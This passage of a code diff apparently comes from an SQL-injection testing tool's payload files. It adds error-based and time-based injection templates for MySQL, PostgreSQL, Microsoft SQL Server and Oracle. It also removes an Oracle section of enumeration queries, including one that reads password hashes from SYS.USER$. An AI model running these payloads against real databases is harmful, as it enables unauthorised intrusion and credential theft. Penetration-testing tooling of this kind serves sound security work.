<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -619,6 +635,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -638,6 +655,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -656,6 +674,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -674,6 +693,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -699,6 +719,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -718,6 +739,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -736,6 +758,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -754,6 +777,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -772,6 +796,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -791,6 +816,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -809,6 +835,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -827,6 +854,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1078,6 +1106,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND SLEEP([SLEEPTIME])</payload>
|
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1097,6 +1126,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1108,25 +1138,6 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
|
||||||
<title>PostgreSQL > 8.1 AND time-based blind</title>
|
|
||||||
<stype>5</stype>
|
|
||||||
<level>1</level>
|
|
||||||
<risk>1</risk>
|
|
||||||
<clause>1</clause>
|
|
||||||
<where>1</where>
|
|
||||||
<request>
|
|
||||||
<payload>AND PG_SLEEP([SLEEPTIME])</payload>
|
|
||||||
</request>
|
|
||||||
<response>
|
|
||||||
<time>[SLEEPTIME]</time>
|
|
||||||
</response>
|
|
||||||
<details>
|
|
||||||
<dbms>PostgreSQL</dbms>
|
|
||||||
<dbms_version>> 8.1</dbms_version>
|
|
||||||
</details>
|
|
||||||
</test>
|
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>SQLite > 2.0 AND time-based blind</title>
|
<title>SQLite > 2.0 AND time-based blind</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
@ -1134,6 +1145,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1154,6 +1166,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1167,7 +1180,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
<!--
|
<!--
|
||||||
NOTE: there is no way to perform this test against Microsoft SQL
|
NOTE: there is no way to perform this test against Microsoft SQL
|
||||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
Server, Sybase, Oracle or PostgreSQL
|
||||||
-->
|
-->
|
||||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||||
<!-- End of AND time-based blind tests -->
|
<!-- End of AND time-based blind tests -->
|
||||||
|
@ -1181,6 +1194,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR SLEEP([SLEEPTIME])</payload>
|
<payload>OR SLEEP([SLEEPTIME])</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1200,6 +1214,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1211,25 +1226,6 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
|
||||||
<title>PostgreSQL > 8.1 OR time-based blind</title>
|
|
||||||
<stype>5</stype>
|
|
||||||
<level>2</level>
|
|
||||||
<risk>3</risk>
|
|
||||||
<clause>1</clause>
|
|
||||||
<where>1</where>
|
|
||||||
<request>
|
|
||||||
<payload>OR PG_SLEEP([SLEEPTIME])</payload>
|
|
||||||
</request>
|
|
||||||
<response>
|
|
||||||
<time>[SLEEPTIME]</time>
|
|
||||||
</response>
|
|
||||||
<details>
|
|
||||||
<dbms>PostgreSQL</dbms>
|
|
||||||
<dbms_version>> 8.1</dbms_version>
|
|
||||||
</details>
|
|
||||||
</test>
|
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>SQLite > 2.0 OR time-based blind</title>
|
<title>SQLite > 2.0 OR time-based blind</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
@ -1237,6 +1233,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1257,6 +1254,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1270,7 +1268,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
<!--
|
<!--
|
||||||
NOTE: there is no way to perform this test against Microsoft SQL
|
NOTE: there is no way to perform this test against Microsoft SQL
|
||||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
Server, Sybase, Oracle or PostgreSQL
|
||||||
-->
|
-->
|
||||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||||
<!-- End of OR time-based blind tests -->
|
<!-- End of OR time-based blind tests -->
|
||||||
|
|
159
xml/queries.xml
159
xml/queries.xml
|
@ -24,7 +24,6 @@
|
||||||
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
||||||
<substring query="MID((%s), %d, %d)"/>
|
<substring query="MID((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||||
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
|
|
||||||
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
||||||
<banner query="VERSION()"/>
|
<banner query="VERSION()"/>
|
||||||
<current_user query="CURRENT_USER()"/>
|
<current_user query="CURRENT_USER()"/>
|
||||||
|
@ -74,84 +73,6 @@
|
||||||
</search_column>
|
</search_column>
|
||||||
</dbms>
|
</dbms>
|
||||||
|
|
||||||
<!-- Oracle -->
|
|
||||||
<dbms value="Oracle">
|
|
||||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
|
||||||
<length query="LENGTH(%s)"/>
|
|
||||||
<isnull query="NVL(%s, ' ')"/>
|
|
||||||
<delimiter query="||"/>
|
|
||||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
|
||||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
|
||||||
<limitgroupstart/>
|
|
||||||
<limitgroupstop/>
|
|
||||||
<limitstring/>
|
|
||||||
<order query="ORDER BY %s ASC"/>
|
|
||||||
<count query="COUNT(%s)"/>
|
|
||||||
<comment query="--"/>
|
|
||||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
|
||||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
|
||||||
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
|
|
||||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
|
||||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
|
||||||
<current_user query="SELECT USER FROM DUAL"/>
|
|
||||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
|
||||||
<!--
|
|
||||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
|
||||||
SELECT USERENV('ISDBA') FROM DUAL
|
|
||||||
-->
|
|
||||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
|
||||||
<users>
|
|
||||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
|
||||||
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
|
||||||
</users>
|
|
||||||
<passwords>
|
|
||||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
|
||||||
</passwords>
|
|
||||||
<!--
|
|
||||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
|
||||||
SELECT * FROM SESSION_PRIVS
|
|
||||||
-->
|
|
||||||
<privileges>
|
|
||||||
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
|
||||||
</privileges>
|
|
||||||
<!--
|
|
||||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
|
||||||
SELECT * FROM SESSION_ROLES
|
|
||||||
-->
|
|
||||||
<roles>
|
|
||||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
|
||||||
</roles>
|
|
||||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
|
||||||
<dbs/>
|
|
||||||
<tables>
|
|
||||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
|
||||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
|
||||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
|
||||||
</tables>
|
|
||||||
<columns>
|
|
||||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
|
||||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
|
||||||
</columns>
|
|
||||||
<dump_table>
|
|
||||||
<inband query="SELECT %s FROM %s"/>
|
|
||||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
|
||||||
</dump_table>
|
|
||||||
<search_db/>
|
|
||||||
<search_table>
|
|
||||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
|
||||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
|
||||||
</search_table>
|
|
||||||
<search_column>
|
|
||||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
|
||||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
|
||||||
</search_column>
|
|
||||||
</dbms>
|
|
